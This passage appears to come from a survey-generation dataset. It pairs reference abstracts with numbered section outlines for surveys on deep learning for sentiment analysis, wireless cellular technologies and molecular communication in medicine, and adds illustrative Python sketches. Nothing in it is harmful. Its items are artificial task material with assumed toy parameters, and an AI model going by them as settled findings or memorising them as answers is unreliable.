platforms. However, multimodal sentiment analysis has only a few high-quality data sets annotated for training machine learning algorithms. These limited resources restrict the generalizability of models, where, for example, the unique characteristics of a few speakers (e.g., wearing glasses) may become a confounding factor for the sentiment classification task. In this paper, we propose a Select-Additive Learning (SAL) procedure that improves the generalizability of trained neural networks for multimodal sentiment analysis. In our experiments, we show that our SAL approach improves prediction accuracy significantly in all three modalities (verbal, acoustic, visual), as well as in their fusion. Our results show that SAL, even when trained on one dataset, achieves good generalization across two new test datasets. --- paper_title: Visual Sentiment Analysis by Attending on Local Image Regions paper_content: Visual sentiment analysis, which studies the emotional response of humans on visual stimuli such as images and videos, has been an interesting and challenging problem. It tries to understand the high-level content of visual data. The success of current models can be attributed to the development of robust algorithms from computer vision. Most of the existing models try to solve the problem by proposing either robust features or more complex models. In particular, visual features from the whole image or video are the main proposed inputs. Little attention has been paid to local areas, which we believe is pretty relevant to human's emotional response to the whole image. In this work, we study the impact of local image regions on visual sentiment analysis. 
Our proposed model utilizes the recent studied attention mechanism to jointly discover the relevant local regions and build a sentiment classifier on top of these local regions. The experimental results suggest that 1) our model is capable of automatically discovering sentimental local regions of given images and 2) it outperforms existing state-of-the-art algorithms to visual sentiment analysis. --- paper_title: Intersubjectivity and sentiment: from language to knowledge paper_content: Intersubjectivity is an important concept in psychology and sociology. It refers to sharing conceptualizations through social interactions in a community and using such shared conceptualization as a resource to interpret things that happen in everyday life. In this work, we make use of intersubjectivity as the basis to model shared stance and subjectivity for sentiment analysis. We construct an intersubjectivity network which links review writers, terms they used, as well as the polarities of the terms. Based on this network model, we propose a method to learn writer embeddings which are subsequently incorporated into a convolutional neural network for sentiment analysis. Evaluations on the IMDB, Yelp 2013 and Yelp 2014 datasets show that the proposed approach has achieved the state-of-the-art performance. --- paper_title: Stance Detection with Bidirectional Conditional Encoding paper_content: Stance detection is the task of classifying the attitude expressed in a text towards a target such as Hillary Clinton to be "positive", negative" or "neutral". Previous work has assumed that either the target is mentioned in the text or that training data for every target is given. This paper considers the more challenging version of this task, where targets are not always mentioned and no training data is available for the test targets. We experiment with conditional LSTM encoding, which builds a representation of the tweet that is dependent on the target, and demonstrate that it outperforms encoding the tweet and the target independently. Performance is improved further when the conditional model is augmented with bidirectional encoding. We evaluate our approach on the SemEval 2016 Task 6 Twitter Stance Detection corpus achieving performance second best only to a system trained on semi-automatically labelled tweets for the test target. When such weak supervision is added, our approach achieves state-of-the-art results. --- paper_title: Volatility Prediction using Financial Disclosures Sentiments with Word Embedding-based IR Models paper_content: Volatility prediction--an essential concept in financial markets--has recently been addressed using sentiment analysis methods. We investigate the sentiment of annual disclosures of companies in stock markets to forecast volatility. We specifically explore the use of recent Information Retrieval (IR) term weighting models that are effectively extended by related terms using word embeddings. In parallel to textual information, factual market data have been widely used as the mainstream approach to forecast market risk. We therefore study different fusion methods to combine text and market data resources. Our word embedding-based approach significantly outperforms state-of-the-art methods. In addition, we investigate the characteristics of the reports of the companies in different financial sectors. ---
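The last reference in this group extends IR term-weighting models by pulling in terms that are related through word embeddings before scoring financial disclosures. One compact way to picture that step is lexicon expansion by cosine similarity, sketched below; the seed terms, the similarity threshold, the random toy embeddings, and the simple frequency-based scoring rule are illustrative assumptions rather than the paper's actual model.

```python
import numpy as np

def expand_lexicon(seeds, emb, threshold=0.8):
    """Add every vocabulary word whose embedding is close to some seed term."""
    def cos(a, b):
        return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b) + 1e-12))
    expanded = set(seeds)
    for word, vec in emb.items():
        if any(cos(vec, emb[s]) >= threshold for s in seeds if s in emb):
            expanded.add(word)
    return expanded

def score_document(tokens, lexicon):
    """Relative frequency of lexicon terms in the document."""
    hits = sum(1 for t in tokens if t in lexicon)
    return hits / max(len(tokens), 1)

# Toy embeddings; in practice these would be pre-trained vectors.
rng = np.random.default_rng(2)
vocab = ["risk", "uncertainty", "volatile", "litigation", "revenue", "growth"]
emb = {w: rng.normal(size=25) for w in vocab}
emb["uncertainty"] = emb["risk"] + 0.05 * rng.normal(size=25)  # force similarity

lex = expand_lexicon({"risk"}, emb)
doc = "revenue growth offset by litigation risk and uncertainty".split()
print(sorted(lex), round(score_document(doc, lex), 3))
```

The expanded-lexicon score could then be fused with market-data features, which is the kind of combination the reference studies.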
Title: Deep Learning for Sentiment Analysis: A Survey
Section 1: Introduction
Description 1: This section provides an overview of sentiment analysis, its importance, and how deep learning has been leveraged in this domain.
Section 2: Deep Learning
Description 2: This section discusses the resurgence of neural networks, particularly deep learning models, in various application domains including sentiment analysis.
Section 3: Word Embedding
Description 3: This section explains the technique of word embedding and its significance for deep learning models in natural language processing tasks.
Section 4: Autoencoder and Denoising Autoencoder
Description 4: This section describes the architecture and functionality of Autoencoders and Denoising Autoencoders in learning representations.
Section 5: Convolutional Neural Network
Description 5: This section covers the basics of Convolutional Neural Networks (CNN) and how they are adapted for text and sentiment analysis.
Section 6: Recurrent Neural Network
Description 6: This section explains the structure and advantages of Recurrent Neural Networks (RNN) and its variants like Bidirectional RNN for sequential data processing.
Section 7: LSTM Network
Description 7: This section presents Long Short Term Memory networks (LSTM), detailing their unique capabilities in handling long-term dependencies in data.
Section 8: Attention Mechanism with Recurrent Neural Network
Description 8: This section delves into the attention mechanism, exploring how it enhances the performance of RNNs in processing long-range dependencies.
Section 9: Memory Network
Description 9: This section explains the concept and working of Memory Networks, focusing on their application in NLP tasks including question answering.
Section 10: Recursive Neural Network
Description 10: This section discusses Recursive Neural Networks (RecNN) and their application in structured data analysis such as parsing trees.
Section 11: Sentiment Analysis Tasks
Description 11: This section introduces the main tasks in sentiment analysis, categorized into document level, sentence level, and aspect level.
Section 12: Document Level Sentiment Classification
Description 12: This section covers approaches and deep learning models used for classifying sentiments at the document level.
Section 13: Sentence Level Sentiment Classification
Description 13: This section reviews techniques and models for determining sentiment within individual sentences.
Section 14: Aspect Level Sentiment Classification
Description 14: This section focuses on classifying sentiment related to specific aspects within a text, covering techniques to manage context and target interactions.
Section 15: Aspect Extraction and Categorization
Description 15: This section details methods and models for extracting and categorizing aspects or targets in sentiment analysis.
Section 16: Opinion Expression Extraction
Description 16: This section outlines deep learning approaches for identifying opinion expressions within texts.
Section 17: Sentiment Composition
Description 17: This section discusses how deep learning models determine the sentiment orientation of compositions in language.
Section 18: Opinion Holder Extraction
Description 18: This section explains methods for extracting the opinion holder, identifying the source of sentiments.
Section 19: Temporal Opinion Mining
Description 19: This section covers techniques used for analyzing opinions over time and predicting future sentiments.
Section 20: Sentiment Analysis with Word Embedding
Description 20: This section highlights the importance of sentiment-encoded word embeddings in improving sentiment analysis models.
Section 21: Sarcasm Analysis
Description 21: This section reviews deep learning models specifically designed for detecting sarcasm in text data.
Section 22: Emotion Analysis
Description 22: This section explores deep learning approaches used to analyze emotions, detailing models beyond sentiment classification.
Section 23: Multimodal Data for Sentiment Analysis
Description 23: This section examines the use of multimodal data (text, visual, acoustic) in sentiment analysis and the corresponding deep learning models.
Section 24: Resource-Poor Language and Multilingual Sentiment Analysis
Description 24: This section presents deep learning applications in sentiment analysis for resource-poor languages and multilingual settings.
Section 25: Other Related Tasks
Description 25: This section highlights additional sentiment analysis-related tasks where deep learning applications have been explored.
Section 26: Conclusion
Description 26: This section summarizes the contributions of deep learning to sentiment analysis and outlines potential future research directions.
Survey of Latest Wireless Cellular Technologies for Enhancement of Spectral Density at Reduced Cost
9
--- paper_title: Block Acquisition of Weak GPS Signals in a Software Receiver paper_content: Block algorithms have been developed to acquire very weak Global Positioning System (GPS) coarse/acquisition (C/A) signals in a software receiver. These algorithms are being developed in order to enable the use of weak GPS signals in applications such as geostationary orbit determination. The algorithms average signals over multiple GPS data bits after a squaring operation that removes the bits’ signs. Methods have been developed to ensure that the pre-squaring summation intervals do not contain data bit transitions. The algorithms make judicious use of Fast Fourier Transform (FFT) and inverse FFT (IFFT) techniques in order to speed up operations. Signals have been successfully acquired from 4 seconds worth of bitgrabbed data with signal-to-noise ratios (SNRs) as low as 21 dB Hz. --- paper_title: Bandwidth optimization control protocol for 4G wireless mobile internet paper_content: Our proposed Bandwidth Optimization Control Protocol allows a mobile node to send request and get reply using two different networks simultaneously. Connection supply for mobile nodes is not done by modifying transport layer protocols, but by handling the update of routing table at the Internet layer using bandwidth optimization control protocol messages, options, and processes that ensure the correct delivery of request and reply. The result from our simulation shows that the mobile node is getting higher data rates and efficiently utilizes network resources as compared to using single network. --- paper_title: Significance of Nanotechnology for Future Wireless Devices and Communications paper_content: This paper reviews the expected wide and profound impact of nanotechnology for future wireless devices and communication technologies. --- paper_title: Hierarchical cell structures with adaptive radio resource management paper_content: In order to increase the growing capacity demands of cellular mobile communication systems, cell splitting will be applied and/or small pico-cells will be established, since both measures can increase spectral efficiency. Hierarchical cellular networks have been suggested previously to overcome the inherent disadvantage of an increased number of handoffs, which both cell splitting and small pico-cells, bring about. A critical question with respect to hierarchical cellular networks is how to divide the available radio resources (i.e. frequencies, channels) among the micro- and macro-cell layers in an optimal way. Another important aspect is the optimal choice of a threshold velocity above which users are assigned to the macro-cell layer Most research in this area so far has dealt with those issues in a static way, assuming fixed traffic and mobility parameters. However in order to be able to adapt the system parameters to temporal and spatial changes of traffic and mobility properties, in this paper two adaptive algorithms are described, which control the threshold velocity as well as the division of resources among the layers, dynamically. The performance of those algorithms is evaluated by means of computer simulations. 
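The GPS block-acquisition reference at the start of this group relies on FFT/IFFT-based circular correlation to locate the code phase of a weak C/A signal efficiently. The snippet below shows only that core operation on a synthetic ±1 code; the code length, delay, and noise level are arbitrary illustrative choices, and a real acquisition would also search over Doppler bins and average over many pre-squaring blocks as the paper describes.

```python
import numpy as np

def circular_correlation(received, replica):
    """Correlate over all code phases at once using FFT/IFFT."""
    return np.fft.ifft(np.fft.fft(received) * np.conj(np.fft.fft(replica))).real

# Synthetic +/-1 spreading code standing in for a 1023-chip C/A code.
rng = np.random.default_rng(3)
code = rng.choice([-1.0, 1.0], size=1023)
true_delay = 417
received = np.roll(code, true_delay) + 2.0 * rng.normal(size=1023)  # shifted + noise

corr = circular_correlation(received, code)
print(int(np.argmax(corr)))   # recovered code phase, expected 417
```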
--- paper_title: 5G Based on Cognitive Radio paper_content: Both the cognitive radio (CR) and the fifth generation of cellular wireless standards (5G) are considered to be the future technologies: on one hand, CR offers the possibility to significantly increase the spectrum efficiency, by smart secondary users (CR users) using the free licensed users spectrum holes; on the other hand, the 5G implies the whole wireless world interconnection (WISDOM--Wireless Innovative System for Dynamic Operating Megacommunications concept), together with very high data rates Quality of Service (QoS) service applications. In this paper, they are combined together into a "CR based 5G". With this aim, two novel ideas are advanced: the 5G terminal is a CR terminal and the CR technology is chosen for WISDOM concept. Thus, the 5G takes CR flexibility and adaptability and makes the first step through a commercial and tangible form. --- paper_title: Smart antennas for future reconfigurable wireless communication networks paper_content: Smart antenna technology is being considered for mobile platforms such as automobiles, cellular telephones (mobile unit), laptops, etc. This paper examines and integrates antenna array characteristics, digital signal processing algorithms (for adaptive beamforming), and the impact of these on the network throughput. The results presented here are part of a project on reconfigurable broadband (high-speed) networks. --- paper_title: Smart Antenna Algorithms for WCDMA Mobile Communication Systems paper_content: The goal of 3 rd generation systems is to integrate a wide variety of communication services such as high speed data, video and multimedia traffic as well as voice signals. WCDMA as the radio access technology for the 3G has many advantages such as highly efficient spectrum utilization and variable user data rates. Smart antenna technologies are very important for the system implementation. Smart Antennas serve different users by radiating narrow beams. The same frequency can be reused even if the users are in the same cell or the users are well separated. Thus the capacity of the system is increased by implementing this additional intra cell reuse. This paper discusses algorithms developed for smart antenna applications to WCDMA. The Direct Matrix Inversion Algorithm and RLS algorithms are the two adaptive beam forming algorithms used in smart antennas. Simulation results show that convergence is faster in the RLS algorithm than in the DMI algorithm. --- paper_title: Bandwidth optimization control protocol for 4G wireless mobile internet paper_content: Our proposed Bandwidth Optimization Control Protocol allows a mobile node to send request and get reply using two different networks simultaneously. Connection supply for mobile nodes is not done by modifying transport layer protocols, but by handling the update of routing table at the Internet layer using bandwidth optimization control protocol messages, options, and processes that ensure the correct delivery of request and reply. The result from our simulation shows that the mobile node is getting higher data rates and efficiently utilizes network resources as compared to using single network. ---
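The WCDMA smart-antenna reference above compares Direct Matrix Inversion (DMI) and RLS adaptive beamforming. The fragment below sketches a DMI-style step for a small uniform linear array: estimate the covariance of the received snapshots, invert it, and steer toward the desired user. The array size, angles, signal powers, and diagonal loading are invented for the example and are not taken from the paper; an RLS variant would replace the explicit inverse with a recursive update.

```python
import numpy as np

def steering_vector(theta_deg, n_elements, spacing=0.5):
    """Uniform linear array response for a plane wave arriving from theta."""
    k = 2 * np.pi * spacing * np.sin(np.deg2rad(theta_deg))
    return np.exp(1j * k * np.arange(n_elements))

def dmi_weights(snapshots, desired_steering, diag_load=1e-3):
    """Sample-covariance (DMI-style) beamformer: w = R^-1 a / (a^H R^-1 a)."""
    R = snapshots @ snapshots.conj().T / snapshots.shape[1]
    R += diag_load * np.eye(R.shape[0])              # diagonal loading
    Rinv_a = np.linalg.solve(R, desired_steering)
    return Rinv_a / (desired_steering.conj() @ Rinv_a)

# Simulated 8-element array: desired user at 10 deg, interferer at -40 deg.
rng = np.random.default_rng(4)
N, snaps = 8, 500
a_des, a_int = steering_vector(10, N), steering_vector(-40, N)
s = (rng.normal(size=snaps) + 1j * rng.normal(size=snaps)) / np.sqrt(2)
i = 3 * (rng.normal(size=snaps) + 1j * rng.normal(size=snaps)) / np.sqrt(2)
noise = 0.1 * (rng.normal(size=(N, snaps)) + 1j * rng.normal(size=(N, snaps)))
X = np.outer(a_des, s) + np.outer(a_int, i) + noise

w = dmi_weights(X, a_des)
print(abs(w.conj() @ a_des), abs(w.conj() @ a_int))  # ~1 toward user, near 0 toward interferer
```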
Title: Survey of Latest Wireless Cellular Technologies for Enhancement of Spectral Density at Reduced Cost
Section 1: Introduction
Description 1: Write about the evolution and core requirements of mobile devices in the context of ubiquitous ambient intelligence.
Section 2: First Generation (1G)-Analog System
Description 2: Describe the characteristics and limitations of the first generation wireless mobile communication system.
Section 3: Orthogonal Frequency Division Multiplexing (OFDM)
Description 3: Discuss the features, applications, and benefits of OFDM technology in wireless communication.
Section 4: Software Defined Radio
Description 4: Explain the principles, benefits, and implementation of Software Defined Radio (SDR) for wireless systems.
Section 5: 5G Concept
Description 5: Provide an overview of the 5G technology, its objectives, cognitive radio integration, and its benefits.
Section 6: Benefit of Nanotechnology
Description 6: Describe how nanotechnology can address various challenges in wireless communication systems, including power efficiency and thermal management.
Section 7: Hierarchical System
Description 7: Discuss the hierarchical cellular networks, including macro cells, micro cells, and pico cells, and their impact on spectral efficiency.
Section 8: Proposed Network
Description 8: Outline the proposed network based on smart antenna, MC-CDMA, and OFDMA technologies to enhance spectral density and reduce costs.
Section 9: Conclusion
Description 9: Summarize the survey of 1G to 4G, 5G, and CR technologies and provide a roadmap for future 5G, 6G, and 7G networks.
Applications of molecular communications to medicine: a survey
6
--- paper_title: Sequence-Specific Peptide Synthesis by an Artificial Small-Molecule Machine paper_content: The ribosome builds proteins by joining together amino acids in an order determined by messenger RNA. Here, we report on the design, synthesis, and operation of an artificial small-molecule machine that travels along a molecular strand, picking up amino acids that block its path, to synthesize a peptide in a sequence-specific manner. The chemical structure is based on a rotaxane, a molecular ring threaded onto a molecular axle. The ring carries a thiolate group that iteratively removes amino acids in order from the strand and transfers them to a peptide-elongation site through native chemical ligation. The synthesis is demonstrated with ~10^18 molecular machines acting in parallel; this process generates milligram quantities of a peptide with a single sequence confirmed by tandem mass spectrometry. --- paper_title: Characterization of signal propagation in neuronal systems for nanomachine-to-neurons communications paper_content: In the next decade, nanocommunications will have a great impact on biomedical engineering applications, for example by enabling the rehabilitation of patients who suffer from irreversible damage to the vertebral column. In such a case, the inability to move, caused by an interruption in the propagation of nervous impulses, could be addressed by exploiting nanomachines that employ the same communication paradigm as neurons to interact with them, thus allowing signal propagation across the critical area of the body. Accordingly, in this paper we perform a characterization and provide a model of the signal propagation between two entities that use a neuronal paradigm of communication, e.g., two neurons or a neuron and a nanomachine, so as to derive expressions for the transfer function, gain, and delay incurred during the transmission. This could allow the design of nanomachines that are compatible with biological structures and able to integrate with or substitute for them when needed. --- paper_title: From P0 to P6 medicine, a model of highly participatory, narrative, interactive, and “augmented” medicine: some considerations on Salvatore Iaconesi’s clinical story paper_content: Salvatore Iaconesi was recently diagnosed with a brain tumor. He decided to share his clinical records not only with doctors but with everybody who wishes to find him a cure. “Because cure is not unique,” he emphasizes, “there are cures for the body and cures for the soul, and everyone, from a painter to a musician, can find me a cure. Please, feel free to take my clinical history for example and let it become a game, a video, a music, a picture, whatever you like.” The emblematic hallmark of the changing times, Salvatore Iaconesi’s case is an example of how many profound revolutions and steps medicine has undertaken during the past few centuries. Stemming from a form of remote medical paternalism and arriving at the concept of a therapeutic alliance, medicine nowadays faces challenges and opportunities at a level before unforeseeable and unimaginable. The new concept of P6 medicine (personalized, predictive, preventive, participatory, psychocognitive, and public) is discussed, together with its profound implications.
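The neuronal signal-propagation abstract above characterizes the channel by its transfer function, gain, and delay, but the derived expressions are not reproduced here. As a hypothetical stand-in only (the first-order low-pass form, DC gain, and corner frequency below are assumptions, not the model from the cited paper), the sketch shows how gain and group delay would be read off such a frequency response.

```python
import numpy as np

def gain_and_delay(f_hz, g0=1.0, fc_hz=100.0):
    """Gain [dB] and group delay [s] of an assumed first-order response
    H(f) = g0 / (1 + j f / fc); purely an illustration of the procedure."""
    w = 2 * np.pi * np.asarray(f_hz, dtype=float)
    wc = 2 * np.pi * fc_hz
    H = g0 / (1 + 1j * w / wc)
    gain_db = 20 * np.log10(np.abs(H))
    delay_s = (1 / wc) / (1 + (w / wc) ** 2)  # -d(phase)/d(omega) for a single pole
    return gain_db, delay_s

gain_db, delay_s = gain_and_delay([1.0, 10.0, 100.0])
```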
--- paper_title: Joint Energy Harvesting and Communication Analysis for Perpetual Wireless Nanosensor Networks in the Terahertz Band paper_content: Wireless nanosensor networks (WNSNs) consist of nanosized communicating devices, which can detect and measure new types of events at the nanoscale. WNSNs are the enabling technology for unique applications such as intrabody drug delivery systems or surveillance networks for chemical attack prevention. One of the major bottlenecks in WNSNs is posed by the very limited energy that can be stored in a nanosensor mote in contrast to the energy that is required by the device to communicate. Recently, novel energy harvesting mechanisms have been proposed to replenish the energy stored in nanodevices. With these mechanisms, WNSNs can overcome their energy bottleneck and even have infinite lifetime (perpetual WNSNs), provided that the energy harvesting and consumption processes are jointly designed. In this paper, an energy model for self-powered nanosensor motes is developed, which successfully captures the correlation between the energy harvesting and the energy consumption processes. The energy harvesting process is realized by means of a piezoelectric nanogenerator, for which a new circuital model is developed that can accurately reproduce existing experimental data. The energy consumption process is due to the communication among nanosensor motes in the terahertz band (0.1-10 THz). The proposed energy model captures the dynamic network behavior by means of a probabilistic analysis of the total network traffic and the multiuser interference. A mathematical framework is developed to obtain the probability distribution of the nanosensor mote energy and to investigate the end-to-end successful packet delivery probability, the end-to-end packet delay, and the achievable throughput of WNSNs. Nanosensor motes have not been built yet and, thus, the development of an analytical energy model is a fundamental step toward the design of WNSNs architectures and protocols. --- paper_title: A simulation tool for nanoscale biological networks paper_content: Nanonetworking is a new interdisciplinary research area including nanotechnology, biotechnology, and ICT. In this paper, we present a novel simulation platform designed for modeling information exchange at nanoscales. This platform is adaptable to any kind of nano bearer, i.e. any mechanism used to transport information, such as electromagnetic waves or calcium ions. Moreover, it includes a set of configuration functions in order to adapt to different types of biological environments. In this paper, we provide a thorough description of the simulation libraries. In addition, we demonstrate their capabilities by modeling a section of a lymph node and the information transfer within it, which happens between antibody molecules produced by the immune system during the humoral immune response. --- paper_title: Diffusion-based Physical Channel Identification in Molecular Nanonetworks paper_content: This work is an exploration of the molecular diffusion channel for molecular nanonetworks, in which the impulse and frequency responses of the channel are identified, its linearity and time invariance are verified, and the main communication characteristics are extracted. Different modulation techniques are evaluated.
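For context on the channel-identification abstract above: the classical closed form for an impulsive point release in unbounded 3-D space is the Green's function of the diffusion equation. The sketch below evaluates it; the cited work identifies its own channel experimentally, so this is only a reference model, and the distance and diffusion coefficient are assumed values.

```python
import numpy as np

def diffusion_impulse_response(d_m, t_s, D=1e-9):
    """Concentration response c(d, t) to an instantaneous point release of one
    molecule in unbounded 3-D space (standard free-diffusion Green's function).

    d_m : transmitter-receiver distance [m]
    t_s : time after release [s]
    D   : diffusion coefficient [m^2/s]; 1e-9 is a typical small-molecule value in water
    """
    t = np.asarray(t_s, dtype=float)
    return (4 * np.pi * D * t) ** -1.5 * np.exp(-d_m ** 2 / (4 * D * t))

# Example: response observed 10 micrometers from the release point
t = np.linspace(1e-3, 5.0, 500)
h = diffusion_impulse_response(10e-6, t)
t_peak = t[np.argmax(h)]  # analytically d^2 / (6 D) for this 3-D case
```

The peak arrival time d^2/(6D) and the pulse spreading are exactly the kind of impulse-response characteristics that an identification procedure like the one in the abstract would extract.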
--- paper_title: Simulating Wireless Nano Sensor Networks in the NS-3 Platform paper_content: The Wireless nanosensor network paradigm is rapidly gaining the attention of researchers within the scientific and industrial communities, thanks to the progress of nanotechnology. The envisioned concept is based on integrated machines at the nano scale, which interact on cooperative basis by means of wireless communications. At the present stage, the design of the protocol suite for wireless nanosensor networks represents a fundamental issue to address for accelerating the deployment process of such a technology. In this direction, the availability of an open source simulator would be surely of help in the development of participated design methodologies, in enforcing the collaboration among different teams, and in easing the verifiability of scientific outcomes. Despite the evident advantages that such a platform could bring, currently available tools only support molecular-based approaches without accounting for the relevant impact that electromagnetic communications may have in this field. To cover this lack, the present contribution proposes a modular and easy upgradeable simulation platform, intended for wireless nanosensor networks based on electromagnetic communication in the terahertz band. Preliminary results drawn from a a simple, yet significant, health monitoring scenario are also provided along with a study on computational requirements and future upgrades. --- paper_title: A systems-theoretic model of a biological circuit for molecular communication in nanonetworks paper_content: Abstract Recent advances in synthetic biology, in particular towards the engineering of DNA-based circuits, are providing tools to program man-designed functions within biological cells, thus paving the way for the realization of biological nanoscale devices, known as nanomachines. By stemming from the way biological cells communicate in the nature, Molecular Communication (MC), i.e., the exchange of information through the emission, propagation, and reception of molecules, has been identified as the key paradigm to interconnect these biological nanomachines into nanoscale networks, or nanonetwork. The design of MC nanonetworks built upon biological circuits is particularly interesting since cells possess many of the elements required to realize this type of communication, thus enabling the design of cooperative functions in the biological environment. In this paper, a systems-theoretic modeling is realized by analyzing a minimal subset of biological circuit elements necessary to be included in an MC nanonetwork design where the message-bearing molecules are propagated via free diffusion between two cells. The obtained system-theoretic models stem from the biochemical processes underlying cell-to-cell MC, and are analytically characterized by their transfer functions, attenuation and delay experienced by an information signal exchanged by the communicating cells. Numerical results are presented to evaluate the obtained analytical expressions as functions of realistic biological parameters. --- paper_title: Predictive, personalized, preventive, participatory (P4) cancer medicine paper_content: Medicine will move from a reactive to a proactive discipline over the next decade--a discipline that is predictive, personalized, preventive and participatory (P4). P4 medicine will be fueled by systems approaches to disease, emerging technologies and analytical tools. 
There will be two major challenges to achieving P4 medicine--technical and societal barriers--and the societal barriers will prove the most challenging. How do we bring patients, physicians and members of the health-care community into alignment with the enormous opportunities of P4 medicine? In part, this will be done by the creation of new types of strategic partnerships--between patients, large clinical centers, consortia of clinical centers and patient-advocate groups. For some clinical trials it will necessary to recruit very large numbers of patients--and one powerful approach to this challenge is the crowd-sourced recruitment of patients by bringing large clinical centers together with patient-advocate groups. --- paper_title: Exploratory Design in Medical Nanotechnology: A Mechanical Artificial Red Cell paper_content: Molecular manufacturing promises precise control of matter at the atomic and molecular level, allowing the construction of micron-scale machines comprised of nanometer-scale components. Medical nanomachines will be among the earliest applications. The artificial red blood cell or “respirocyte” proposed here is a bloodborne spherical 1-micron diamondoid 1000-atm pressure vessel with active pumping powered by endogenous serum glucose, able to deliver 236 times more oxygen to the tissues per unit volume than natural red cells and to manage carbonic acidity. An onboard nanocomputer and numerous chemical and pressure sensors enable complex device behaviors remotely reprogrammable by the physician via externally applied acoustic signals. --- paper_title: Molecular Communication and Networking: Opportunities and Challenges paper_content: The ability of engineered biological nanomachines to communicate with biological systems at the molecular level is anticipated to enable future applications such as monitoring the condition of a human body, regenerating biological tissues and organs, and interfacing artificial devices with neural systems. From the viewpoint of communication theory and engineering, molecular communication is proposed as a new paradigm for engineered biological nanomachines to communicate with the natural biological nanomachines which form a biological system. Distinct from the current telecommunication paradigm, molecular communication uses molecules as the carriers of information; sender biological nanomachines encode information on molecules and release the molecules in the environment, the molecules then propagate in the environment to receiver biological nanomachines, and the receiver biological nanomachines biochemically react with the molecules to decode information. Current molecular communication research is limited to small-scale networks of several biological nanomachines. Key challenges to bridge the gap between current research and practical applications include developing robust and scalable techniques to create a functional network from a large number of biological nanomachines. Developing networking mechanisms and communication protocols is anticipated to introduce new avenues into integrating engineered and natural biological nanomachines into a single networked system. In this paper, we present the state-of-the-art in the area of molecular communication by discussing its architecture, features, applications, design, engineering, and physical modeling. We then discuss challenges and opportunities in developing networking mechanisms and communication protocols to create a network from a large number of bio-nanomachines for future applications. 
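The molecular communication overview above describes senders encoding information onto molecules, propagation through the medium, and receivers reacting chemically to decode it. A common bit-level abstraction of such a link is on-off keying on molecule counts; the toy sketch below uses assumed numbers for release size, capture probability, background noise, and threshold, none of which come from the cited papers.

```python
import numpy as np

rng = np.random.default_rng(0)

N_TX = 200          # molecules released for bit '1' (assumed)
P_ARRIVE = 0.05     # probability a released molecule is captured in the slot (assumed)
LAMBDA_NOISE = 2.0  # mean stray-molecule count per slot (assumed)
THRESHOLD = 6       # receiver decision threshold on the observed count (assumed)

def received_counts(bits):
    """Binomial capture of released molecules plus Poisson background noise."""
    counts = []
    for b in bits:
        signal = rng.binomial(N_TX, P_ARRIVE) if b else 0
        counts.append(signal + rng.poisson(LAMBDA_NOISE))
    return np.array(counts)

bits = rng.integers(0, 2, 1000)
decisions = (received_counts(bits) >= THRESHOLD).astype(int)
ber = np.mean(decisions != bits)  # empirical bit error rate of the toy link
```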
--- paper_title: Circulating microRNA-101 as a potential biomarker for hepatitis B virus-related hepatocellular carcinoma paper_content: Circulating microRNAs (miRNAs) are emerging as promising biomarkers for cancer; however, the significance of circulating miRNAs in hepatitis B virus (HBV)-related hepatocellular carcinoma (HCC) remains largely unknown. Based on our prior observations that miRNA-101 (miR-101) is downregulated by HBV and induces epigenetic modification, we sought to test whether circulating miR-101 may serve as a potential biomarker for HCC. The expression of miR-101 in HCCs and serum was evaluated by real-time polymerase chain reaction. Tissue and serum miR-101 levels were assessed in samples from patients with HBV-related HCC and healthy controls. A potential correlation was also evaluated between miR-101 expression and the clinicopathological features and prognosis of HCC patients. miR-101 was downregulated in HBV-related HCC tissues compared with adjacent noncancerous tissues. Furthermore, the miR-101 levels in these tissues from HCC patients were significantly lower than those in tissues from control subjects. Notably, serum miR-101 levels were found to have an inverse correlation with tissue miR-101 expression levels. The expression of serum miR-101 in patients with HBV-related HCC was significantly higher than that in the healthy controls, and this increase correlated with hepatitis B surface antigen positivity, HBV DNA levels and tumor size. These results indicate that different factors govern the levels of miR-101 in the tissue and serum of HCC patients. Given the marked and consistent increase in serum miR-101 levels in HCC patients, circulating miR-101 may serve as a promising biochemical marker for monitoring the progression of tumor development in HBV-related HCC. --- paper_title: Unexpected gain of function for the scaffolding protein plectin due to mislocalization in pancreatic cancer paper_content: We recently demonstrated that plectin is a robust biomarker for pancreatic ductal adenocarcinoma (PDAC), one of the most aggressive malignancies. In normal physiology, plectin is an intracellular scaffolding protein, but we have demonstrated localization on the extracellular surface of PDAC cells. In this study, we confirmed cell surface localization. Interestingly, we found that plectin cell surface localization was attributable to its presence in exosomes secreted from PDAC cells, which is dependent on the expression of integrin β4, a protein known to interact with cytosolic plectin. Moreover, plectin expression was necessary for efficient exosome production and was required to sustain enhanced tumor growth in immunodeficient and in immunocompetent mice. It is now clear that this PDAC biomarker plays a role in PDAC, and further understanding of plectin’s contribution to PDAC could enable improved therapies. --- paper_title: Programmable probiotics for detection of cancer in urine paper_content: Rapid advances in the forward engineering of genetic circuitry in living cells have positioned synthetic biology as a potential means to solve numerous biomedical problems, including disease diagnosis and therapy. One challenge in exploiting synthetic biology for translational applications is to engineer microbes that are well tolerated by patients and seamlessly integrate with existing clinical methods.
We use the safe and widely used probiotic Escherichia coli Nissle 1917 to develop an orally administered diagnostic that can noninvasively indicate the presence of liver metastasis by producing easily detectable signals in urine. Our microbial diagnostic generated a high-contrast urine signal through selective expansion in liver metastases (10^6-fold enrichment) and high expression of a lacZ reporter maintained by engineering a stable plasmid system. The lacZ reporter cleaves a substrate to produce a small molecule that can be detected in urine. E. coli Nissle 1917 robustly colonized tumor tissue in rodent models of liver metastasis after oral delivery but did not colonize healthy organs or fibrotic liver tissue. We saw no deleterious health effects on the mice for more than 12 months after oral delivery. Our results demonstrate that probiotics can be programmed to safely and selectively deliver synthetic gene circuits to diseased tissue microenvironments in vivo. --- paper_title: CD164 regulates the tumorigenesis of ovarian surface epithelial cells through the SDF-1α/CXCR4 axis paper_content: Background: CD164 (endolyn), a sialomucin, has been reported to play a role in the proliferation, adhesion, and differentiation of hematopoietic stem cells. The potential association of CD164 with tumorigenicity remains unclear. Methods: The clinicopathological correlation of ovarian cancer with CD164 was assessed in a 97-patient tumor tissue microarray. CD164 was overexpressed or silenced to analyze its effect on proliferation, colony formation, and apoptosis via a mouse xenograft model and western blotting analysis. The subcellular localization of CD164 was examined by immunohistochemical and confocal analysis. Results: Our data demonstrated that higher expression levels of CD164 were identified in malignant ovarian cancer cell lines, such as SKOV3 and HeyA8. The clinicopathological correlation analysis showed that the upregulation of CD164 protein was significantly associated with tumor grade and metastasis. The overexpression of CD164 in human ovarian epithelial surface cells promoted cellular proliferation and colony formation and suppressed apoptosis. These tumorigenicity effects of CD164 were reconfirmed in a mouse xenograft model. We also found that the overexpression of CD164 proteins 